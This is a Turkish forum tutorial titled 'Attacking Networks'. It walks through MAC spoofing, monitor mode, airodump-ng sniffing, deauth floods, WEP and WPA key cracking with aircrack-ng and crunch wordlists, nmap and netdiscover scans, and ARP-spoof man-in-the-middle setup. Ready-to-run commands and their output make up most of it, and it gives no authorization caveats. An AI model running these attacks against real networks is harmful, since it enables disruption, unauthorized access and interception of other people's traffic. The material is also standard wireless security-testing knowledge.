Hoşgeldin Misafir

Ağlara Saldırmak

bypatnos

DeepWeb
28 Haz 2024
614 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:

Ağlara Saldırmak


Merhabalar Ben @bypatnos Lojistik grup adına paylaşılan Ağlara Saldırmak makalesinde sizi görmekten mutluyum.
Dökümanımızın bu bölümünde bolca wlan0 argümanını göreceğiz. Ağ arayüzümüzü temsil eder. Benim cihazımda wlan0 olarak gözüktüğü için argüman olarak wlan0 gönderiyorum. Döküman boyunca wlan0 gördüğümüz yerlerin argüman olduğunu ve kendinize ait işlem yapmak istediğiniz ağ arayüzünüzü kullanmanız gerektiğini lütfen unutmayın. 😇


  • Ağ arayüzlerimizi listelemek ve öğrenmek için ifconfig komutunu kullanabiliriz.
  • Sadece wireless arayüzlerimizi listelemek için ise iwconfig wlan0 komutunu kullanabiliriz. Yine kendinize ait ağ arayüzünü argüman olarak göndermeniz gerektiğini lütfen unutmayınız. 😇

Saldırı Öncesi Ayarlar

MAC Adresi Değiştirmek

Cihazlar birbirleriyle iletişim kurarken MAC adresleri üzerinden iletişim kurarlar. Fakat bunu sistemsel olarak değiştirebiliriz.

  • ifconfig wlan0 down ağ arayüzümüzü düşürüyoruz, servis dışı bırakıyoruz.
  • macchanger wlan0 --random komutu ile ilgili ağ arayüzümüzün MAC adresini değiştiriyoruz. Çıktıdan da görüleceği üzere MAC adresi başarılı bir şekilde değişmiş oldu.
  • ifconfig wlan0 up komutu ile tekrar ağ arayüzümüzü aktif hale getiriyoruz.
Kod:
# ifconfig wlan0 down
# macchanger wlan0 --random
>>> Current MAC:   2a:f9:66:3e:94:53 (unknown)
Permanent MAC: 4c:bb:58:42:c3:89 (unknown)
New MAC:       82:b3:a4:1e:dd:08 (unknown)

# ifconfig wlan0 up

# ifconfig
>>> wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.105  netmask 255.255.255.0  broadcast 192.168.1.255
        ether 82:b3:a4:1e:dd:08  txqueuelen 1000  (Ethernet)
        RX packets 11961  bytes 1369251 (1.3 MiB)
        RX errors 0  dropped 2  overruns 0  frame 0
        TX packets 1262  bytes 228105 (222.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Monitor ve Managed Mod

Ufak bir not: wlan0 ve wlan0mon argümanlarının cihazdan cihaza değişebileceğini lütfen unutmayın 😇 Kendi ağ arayüzlerinizi listelemek için ifconfig kullanabilirsiniz 😇
Monitor Mode: herhangi bir ağa bağlanmadan pasif olarak ilgili ağdaki tüm trafiği izlememize olanak sağlayan mod.
Managed Mode: istemcimizin bir ağa bağlanarak hizmet aldığı mod.


Mod Değiştirmek İçin 1. Yöntem (airmon-ng)

  • airmon-ng start wlan0 ile monitör mod'a geçebiliriz.
  • ifconfig ile veya iwconfig wlan0mon ile monitör mod'a geçip geçmediğimize bakabiliriz.
  • airmon-ng stop wlan0mon ile geri managed mod'a geçebiliriz.
Kod:
# airmon-ng start wlan0
>>> Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    909 wpa_supplicant
  16148 NetworkManager

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)


# iwconfig wlan0mon
>>> wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=16 dBm  
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off


# airmon-ng stop wlan0mon
>>> PHY     Interface       Driver          Chipset

phy0    wlan0mon        ath9k           Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

                (mac80211 station mode vif enabled on [phy0]wlan0)

                (mac80211 monitor mode vif disabled for [phy0]wlan0mon)

Mod Değiştirmek İçin 2. Yöntem (iwconfig)

  • ifconfig wlan0 down komutu ile ilgili ağ arayüzümüzü servis dışı bırakırız
  • iwconfig wlan0 mode monitor ilgili ağ arayüzümüzü monitor moda geçiririz
  • ifconfig wlan0 up ilgili ağ arayüzümüzü tekrar devreye sokarız
  • iwconfig wlan0 ile ilgili ağ arayüzümüzün modunu kontrol edebiliriz
Kod:
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# ifconfig wlan0 up
# iwconfig wlan0
>>> wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=16 dBm  
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
  • Geri çevirmek istersek ise aynı komutları managed mode için yapıyoruz.
  • ifconfig wlan0 down komutu ile ilgili ağ arayüzümüzü servis dışı bırakırız
  • iwconfig wlan0 mode managed ilgili ağ arayüzümüzü managed moda geçiririz
  • ifconfig wlan0 up ilgili ağ arayüzümüzü tekrar devreye sokarız
  • iwconfig wlan0 ile ilgili ağ arayüzümüzün modunu kontrol edebiliriz
Kod:
# ifconfig wlan0 down
# iwconfig wlan0 mode managed
# ifconfig wlan0 up
# iwconfig wlan0
>>> wlan0     IEEE 802.11  ESSID:"SUPERONLINE_WiFi_9547"
          Mode:Managed  Frequency:2.462 GHz  Access Point: 64:6D:6C:65:03:82  
          Bit Rate=39 Mb/s   Tx-Power=16 dBm  
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=24/70  Signal level=-86 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:1  Invalid misc:2   Missed beacon:0

Ağlarla İlgili Bilgi Toplamak

Ağları İncelemek (Sniffing)

Networkler üzerindeki trafikleri izlemeye verilen isim sniffing'dir.

  • Öncelikle eğer monitör modda değilsek airmon-ng start wlan0 ile monitör moda geçebiliriz.
  • Teyit etmek için bir üst başlıktan bildiğimiz iwconfig wlan0mon komutunu kullanabiliriz.
  • Sniffing yapmak için airodump-ng wlan0mon komutunu kullanabiliriz. Bu sayede etrafımızdaki ağları ve onlarla ilgili bilgileri görebiliriz. ctrl + c kombinasyonu ile çıkış yapabiliriz.
Kod:
# airmon-ng start wlan0
# airodump-ng wlan0mon
airodump-ng wlan0mon airodump-ng sonucu gelen veriler ne anlama gelmektedir?


  • BSSID -> MAC Adresi
  • PWR -> Power, ağların bize uzaklığıdır. Absolute olarak küçüldükçe bize yaklaşmaktadır. Yani -84 olarak gözüken ilk ağ -85 olana göre daha yakındadır
  • Beacons -> Sinyaller
  • #Data -> Elimizde olan, kullanabileceğimiz datalar
  • CH -> Channel, veri alış-verişi hangi kanaldan yapılıyor onu göstermektedir
  • ENC -> Encryption, ağın nasıl şifrelendiğini göstermektedir. WPA2 diğerlerine göre daha güvenlidir
  • CIPHER -> Decrypt modeli
  • ESSID -> Ağın adıdır

Belirli Bir Ağa Özel Bilgi Edinmek

Temel olarak yapı şu şekildedir: airodump-ng --channel <channel> --bssid <bssid> --write <file-name> <interface>

  • # airodump-ng --channel 11 --bssid 64:6D:6C:65:03:82 --write deneme.txt wlan0mon komutu ile tek bir bssid'e ait trafiği izlemeye başladık. Ve bize bu ağa bağlı cihazların MAC adresleri (STATION) vb. kritik bilgileri verecektir. --write argümanını geçersek aldığı bilgileri bir dosyaya yazacaktır.
Kod:
# airodump-ng --channel 11 --bssid 64:6D:6C:65:03:82 --write deneme.txt wlan0mon
airodump-ng ağa özel

Ağa özel bilgi edindikten sonra gelen veriler bir önceki başlığa ek olarak;


  • Frames -> Paket alış-verişindeki paketlerin sayısını verir.
  • Bu ekrandaki çıktıdan daha detaylı olan bilgi --write argümanı ile yazılan .cap uzantılı dosya içerisinde bulunur.

Deauth Saldırısı

Deauth saldırısı kısaca hedef cihaz ile host arasındaki iletişimi keserek (deauthentication paketleri göndererek) hedefi ağdan düşürme saldırısıdır. Bunu da aireplay aracını kullanarak yapacağız.
Deauth Paketi Nedir?
Bir client (istemci/biz) bağlı olduğu kablosuz ağ ile olan bağlantısını koparmak istediğinde aslında istemci, kablosuz ağa bir deauthentication paketi gönderir ve bağlantıyı sonlandırır. Biz de bu saldırıda başkalarının (hedef) adına modemlere (kaynak) deauthentication paketleri göndereceğiz ve hedefleri ağdan düşüreceğiz.
Temel komut dizimi şu şekildedir: aireplay-ng --deauth <packets> -a <kaynak_mac> -c <hedef_mac> <interface>
Bu saldırıda mantık şu şekilde işlemektedir; kaynak, düşürmeye çalıştığımız hedefe: 'ben senden ayrılacağım' diyor, hedef de kaynağa diyor ki: 'ben senden ayrılacağım'. Aslında ikisi de birbirlerine bir şey demiyor. Biz kendilerinin yerlerine geçip yine kendilerine bir şeyler söylüyoruz gibi düşünebiliriz.


  • aireplay-ng --deauth 10000 -a 64:6D:6C:65:03:82 -c 0E:80:62:12:28:0D wlan0mon komutu ile kaynak MAC ve hedef MAC'e deauth paketleri (10000 adet) yolluyoruz.
  • Eğer kısa süreli ağdan düşsün ve geri bağlansın istersek 5 10 adet paket yollayabiliriz.
aireplay-ng deauth

Ağlara Saldırmak

Ufak Bir Not:
Bu bölümdeki işlemleri yaparken ağ arayüzümüzün monitör modda olduğundan emin olalım. Aynı zamanda wlan0 ve wlon0mon argümanlarının kendi ağ arayüzlerinizi temsil ettiğinden lütfen emin olun. 😇

Encryption (Şifreleme Modelleri)

  • WEP (Wired Equivalent Privacy)
    • Authentication (Kimlik doğrulama) yoktur.
    • Kırılması WPA'ye göre daha kolaydır.
  • WPA (Wi-Fi Protected Access)
    • TKIP,Wpa şifreleme için kabul edildi. Wep’te değişmeyen 64bit ve 128bit şifreleme anahtarı kullanılmıştır.
    • TKIP her paket için dinamik olarak yeni bir 128bit anahtar üretir ve bu yönüyle wep’teki zaafiyetlerin önüne geçti.
    • Wpa’nın saldırganlara yönelik attığı adım ile saldırganın veri paketlerini değiştirmesini ve değiştirdiği paketlerin gönderilmesini önlemek için tasarlanmış bir ileti bütünlüğü kontrolü(Message Integrity Check) sağlamaktadır.
  • WPA2 (Wi-Fi Protected Access)
    • Şuan hala kullanımımız da bulunan en güvenilir kablosuz ağ şifrelemesidir.
    • TKIP’den, hem gizlilik hem de bütünlük açısından korunmasında önemli ölçü de güçlüdür.
    • Aes güçlü güvenlik tabanlı şifreleme içerdiği için 2004’te sertifikası başladı ve 2006 dan itibaren tüm yeni cihazlarda WPA2 sertifikası zorunlu kılındı.

WEP

WEP Cracking

WEP cracking yaparken adım adım şu yolları izleyeceğiz:

  • Etraftaki ağları izleyip WEP şifrelemesine sahip bir hedef ağ belirleyeceğiz -> airodump-ng wlan0mon
  • Hedef ağa karşı sniffing yapacağız. Ardından ele geçirdiğimiz bilgileri dosyaya yazacağız -> airodump-ng --channel <channel> --bssid <bssid> --write <file-name> <interface>
  • aircrack-ng sayesinde verileri decrypt ederek şifreyi kırmaya çalışacağız. -> aircrack-ng <filename.cap> Unutmamalız ki bu işlem paket alış-verişi yapılırken gerçekleşecektir. Bu sebeple bir yandan da airodump-ng ile hedef ağa dair bilgileri toplamaya devam etmeliyiz. 5000 pakette bir deneme yapacaktır ve bulduğu an bize şifreyi verecektir.
  • Dönen şifre içerisinden : işaretlerini kaldırmalıyız

Fake Auth (Sahte Yetkilendirme)

WEP Cracking yaparken ağ üzerindeki paketleri izlediğimizi söylemiştik. Peki ya hiç paket alış-verişi yoksa ne yapacağız? Kendimizi ağa tanıtıp bizi dinlemesini sağlayabiliriz. Tam bu noktada Fake Auth saldırısı ile kendimizi sahte olarak yetkilendirebilir ve hedef ağa paket enjekte edebiliriz.
Temel komut dizilimi şu şekildedir -> aireplay-ng --fakeauth 0 -a <hedef_mac> -h <kendi_mac_adresimiz> <ag_arayuzu/interface>
Bu komuttan sonra tekrar hedef ağa airodump-ng ile sniffing yaparsak kendi MAC adresimizi de ağa bağlı cihazlar listesinde görebiliriz. Fakat sadece ağa kendimizi tanıtmış olduk, bu ağı şu an kullanamayız.


Package Injection (Paket Enjeksiyonu)

Hedef ağ üzerinde paket alış-verişi yaparak veri akışını sağlarız

  • Önce hedef ağa Fake Auth ile kendimizi tanıtırız/yetkilendiririz
  • Temel komut dizilimi şu şekildedir -> aireplay-ng --arpreplay -b <hedef_mac> -h <kendi_mac_adresimiz> <ag_arayuzu/interface>
  • Bu komuttan sonra hedef ağ üzerinde çok sayıda paket alış-verişi yapılmaya başlanır. Ardından airodump-ng ile izlediğimiz ağdan elde ettiğimiz verileri yazdığımız dosyayı aircrack-ng ile decrypt ederek şifreyi bulmaya çalışırız

WPA

Öncelikle Handshake yakalamaya çalışacağız. İçinde muhtemel şifrelerin olduğu bir Wordlist hazırlayacağız ve oluşturduğumuz Handshake'e karşı şifreleri deneyeceğiz

Handshake Yakalamak

airodump-ng Handshake'i yeni bir kişi ağa bağlanınca yakalayabilir. 2 şey yapabiliriz.

  • 1-) Bekleriz ki yeni birisi ağa bağlansın
  • 2-) Mevcut ağa bağlı birini Deauth Saldırısı ile ağdan düşürürüz ve yeniden bağlanmasını sağlarız. Yakalanan Handshake sağ üstte gözükecektir (airodump-ng ile hedef ağı izlerken). Yakaladığımız Handshake yazdığımız dosya içerisinde vardır ve oluşturduğumuz Wordlist'i bu Handshake'e karşı deneyebiliriz

Wordlist Oluşturmak

Wordlist oluşturmak için CRUNCH adı verilen tool'u kullanabiliriz.
Temel komut dizimi şu şekildedir -> crunch <min> <max> <char> -t <pattern> -o <dosya_adi>
Kod:
# crunch 8 9 xyz123 -o testwordlist
>>> Crunch will now generate the following amount of data: 115893504 bytes                                                                                              
110 MB                                                                                                                                                              
0 GB                                                                                                                                                                
0 TB                                                                                                                                                                
0 PB                                                                                                                                                                
Crunch will now generate the following number of lines: 11757312                                                                                                    
                                                                                                                                                                     
crunch: 100% completed generating output

# cat testwordlist
>>> xxzxx2z3                                                                                                                                                            
xxzxx21x                                                                                                                                                            
xxzxx21y                                                                                                                                                            
xxzxx21z                                                                                                                                                            
xxzxx211                                                                                                                                                            
xxzxx212                                                                                                                                                            
xxzxx213                                                                                                                                                            
xxzxx22x                                                                                                                                                            
xxzxx22y    
.
.
.
.

Handshake'e Karşı Wordlist Kullanmak

Oluşturduğumuz Wordlist'i yakaladığımız Handshake'e karşı kullanacağız.
Temel komut dizimi şu şekildedir -> aircrack-ng <yakaladigimiz_handshake_bulunan_dosya.cap> -w <word_list_dosyamiz>
Kod:
# aircrack-ng deneme-01.cap -w testwordlist

Bağlantı Sonrası Yapılacaklar

Bu bölümde yapılan uygulamalar ve çalıştırılan komutlar 2 cihazında (biz ve hedef) aynı ağda olduğu varsayılarak yapılmıştır. Hedef olarak Virtualbox üzerinde Windows10 işletim sistemi kurdum ve Network modunu Bridge olarak ayarladım.
Aynı zamanda bu bölümde yazdığım:


  • 192.168.1.218 -> hedef cihazımın IP adresi
  • 192.168.1.87 -> benim cihazımın IP adresi
  • 192.168.1.0/24 -> yine bana ait IP taraması yaparken kullanacağım adres. Eğer ki siz hedef bilgisayarınızı ve kali cihazınızı sanal makina üzerinden çalıştırıyorsanız Nat Mod'da çalıştırmanız durumunda IP adresleri 10.0.1.0/24 ve 10.0.1.12 vb. şekilde değişebilecektir 😇 Adreslere değil komutlara, tool'lara ve çalışma mantıklarına odaklanmakta fayda var 😇

Bağlandığımız Ağları İncelemek

Netdiscover

Mevcut bağlı olduğumuz ağ üzerindeki IP adreslerini taramamızı sağlayan tool'dur. Temel komut dizimi şu şekildedir -> netdiscover -i <interface> -r <range>

  • netdiscover -i wlan0 -r 192.168.1.0/24 -> 0/24 sonu 0-24 arasındakiler demek değildir. Şimdilik tüm IP adresleri olarak bilsek yeterlidir.
Kod:
# netdiscover -i wlan0 -r 192.168.1.0/24 // -i argümanını yollamak zorunda değiliz
>>>  Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                      
                                                                                                                                                                   
 15 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 864                                                                                                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
 -----------------------------------------------------------------------------
 192.168.1.1     64:6d:6c:65:03:79      6     360  HUAWEI TECHNOLOGIES CO.,LTD                                                                                      
 192.168.1.20    6c:ef:c6:6b:81:1e      3     180  SHENZHEN TWOWING TECHNOLOGIES CO.,LTD.                                                                          
 192.168.1.46    64:76:ba:b5:1b:dc      1      60  Apple, Inc.                                                                                                      
 192.168.1.21    0e:80:62:12:28:0c      1      60  Unknown vendor                                                                                                  
 192.168.1.218   08:00:27:e6:e5:59      2      84  PCS Systemtechnik GmbH                                                                                          
 192.168.1.36    0e:80:62:eb:2d:50      1      60  Unknown vendor                                                                                                  
 192.168.1.105   0e:80:62:42:c3:89      1      60  Unknown vendor

Nmap

Nmap aracını da bağlı olduğumuz ağdaki IP adreslerini bulmak için kullanabiliriz. Temel komut dizimi şu şekildedir -> nmap <IP>

Kod:
# nmap 192.168.1.0/24
>>> Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 19:44 +03
Nmap scan report for 192.168.1.1
Host is up (0.00031s latency).
Not shown: 995 filtered ports
PORT    STATE SERVICE
21/tcp  open  ftp
53/tcp  open  domain
80/tcp  open  http
443/tcp open  https
990/tcp open  ftps
MAC Address: 64:6D:6C:65:03:79 (Huawei Technologies)

Nmap scan report for 192.168.1.20
Host is up (0.0015s latency).
All 1000 scanned ports on 192.168.1.20 are closed
MAC Address: 6C:EF:C6:6B:81:1E (Shenzhen Twowing Technologies)

Nmap scan report for 192.168.1.21
Host is up (0.0025s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 0E:80:62:12:28:0C (Unknown)

Nmap scan report for 192.168.1.36
Host is up (0.0020s latency).
Not shown: 999 closed ports
PORT      STATE SERVICE
62078/tcp open  iphone-sync
MAC Address: 88:E9:FE:EB:2D:50 (Apple)

Nmap scan report for 192.168.1.38
Host is up (0.010s latency).
All 1000 scanned ports on 192.168.1.38 are filtered (828) or closed (172)
MAC Address: 0E:80:62:95:DB:42 (Unknown)

Nmap scan report for 192.168.1.218
Host is up (0.00025s latency).
All 1000 scanned ports on 192.168.1.218 are filtered
MAC Address: 08:00:27:E6:E5:59 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.87
Host is up (0.0000070s latency).
All 1000 scanned ports on 192.168.1.87 are closed

Nmap scan report for 192.168.1.105
Host is up (0.0000090s latency).
All 1000 scanned ports on 192.168.1.105 are closed

Nmap done: 256 IP addresses (8 hosts up) scanned in 64.19 seconds

Wireshark

Ağları incelemek için kullanılan program. Terminale wireshark yazarak açabiliriz.

Man In The Middle (Ortadaki Adam/MITM)


MITM saldırısında olay kısaca şu şekilde işlemektedir;

  • Kurban, sunucuya bir istek atar ve sunucu ona cevap verir (klasik bir network trafiği)
  • Fakat MITM saldırısında biz Kurban'a: "sunucu benim" diyoruz
    Sunucuya da: "kurban benim" diyoruz
    Bu sayede Network Trafiği bizim üzerimizden akmaktadır ve gelip giden paketlere müdahale edebiliriz
  • Daha da kısa olarak: Network trafiğinde client ile host arasına girerek trafikten bilgi alıyoruz
  • Bu saldırıyı MAC adresleri üzerinden gerçekleştiriyoruz. Bunun sebebini Üst başlıklarda açıklamıştık MITM Mimari

ARP Spoof (ARP Kandırma)

ARP'nin ne olduğunu yine üst başlıklarda açıklamıştık. Bu sistemde bir açık bulunmaktadır. ARP isteği almadan ARP cevabı gönderme hakkımız bulunmaktadır. Bu açığı kullanarak MITM saldırısında bulunacağız
Temel komut dizimi şu şekildedir:


  • arpspoof -i <interface> -t <target_IP> <sunucu_IP/modem_IP> -> Bu şu anlama gelmektedir: <target_IP>'yi sanki <sunucu_IP/modem_IP>'ymişim gibi kandıracağım
  • arpspoof -i <interface> -t <sunucu_IP/modem_IP> <target_IP> -> Bu da şu anlama gelmektedir: <sunucu_IP/modem_IP>'yi sanki <target_IP>'ymişim gibi kandıracağım
  • Yani önce hedefe modemmiş gibi, sonra da modeme hedefmiş gibi davranıyoruz.
  • Fakat bu kadar yapmamız yetmez. Bu şekilde bırakırsak hedef'in ağı çöker ve İnternet'e giriş yapamaz. Biz kendi kalimiz üzerinde IP yönlendirmesini aktif hale getirmeliyiz.
    • Bunun için de echo 1 > /proc/sys/net/ipv4/ip_forward komutunu kullanırız. Bunu Kali'yi her aç-kapa yaptığımızda yapmalıyız
  • Yukarıdaki işlemlerin her birinin farklı terminallerde çalışması gerektiğini söylemeye gerek yoktur sanırsam 😇
Kod:
# arpspoof -i eth0 -t 192.168.1.218 192.168.1.1
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.218
# echo 1 > /proc/sys/net/ipv4/ip_forward

LOJİSTİK TİM SUNDU

btn1pyf.png
 
Son düzenleme: